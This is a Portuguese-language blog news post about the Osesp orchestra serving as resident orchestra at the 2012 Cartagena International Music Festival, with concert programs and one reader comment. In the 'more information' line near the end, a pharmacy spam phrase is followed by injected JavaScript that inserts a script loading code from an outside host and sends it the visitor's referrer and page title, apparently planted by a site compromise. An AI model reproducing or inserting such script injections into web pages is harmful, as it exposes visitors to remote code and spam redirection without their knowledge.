LateralNotícia

Osesp no Festival de Cartagena – Colômbia

Osesp embarca para Colômbia como orquestra residente do Festival Internacional de Música de Cartagena.

A Osesp começa 2012 como orquestra residente do VI Festival Internacional de Música de Cartagena, que acontece entre os dias 6 e 14 de janeiro com o tema “El Sonido de Las Américas” (O Som das Américas), celebrando a música e os intérpretes de todo o continente americano. Serão 42 músicos da Osesp representando o Brasil em prestigiado festival internacional que acontece todos os anos na belíssima cidade antiga da Colômbia.

A Orquestra fará cinco concertos no Festival, sendo quatro récitas sob regência de Celso Antunes – regente associado a partir deste ano – e uma sob a batuta de Cláudio Cruz. Os músicos também realizarão concertos de câmara, divididos em formações diversas.

No concerto inaugural, a Osesp interpreta duas obras de compositores brasileiros: Banzaglia, de Antônio Carlos Jobim, e Bachianas Brasileiras nº 4, de Heitor Villa-Lobos. Completa o repertório o Concerto para Piano nº 1, de Chopin, com a participação da pianista Blanca Uribe.

A Osesp também participa do encerramento do Festival, interpretando a Paixão Segundo São Marcos, de Osvaldo Golijov, no Centro de Convenções situado ao lado da muralha da cidade fortificada e da Alcadía, prédio histórico em que funciona a sede do governo local. Golijov, um dos grandes nomes da música contemporânea e compositor residente da Osesp na Temporada 2010, estará presente no concerto.

Mais informações sobre os concertos em:

prednisone tablets for sale http://www.osesp.art.br/portal/imprensa/bancodenoticias.aspx?chave=228document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

1 Comment

  1. Bravo aos componentes da OSESP que irão representar o Brasil na Colômbia. Isso dignifica a cultura brasileira na América do Sul. Parabéns.

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.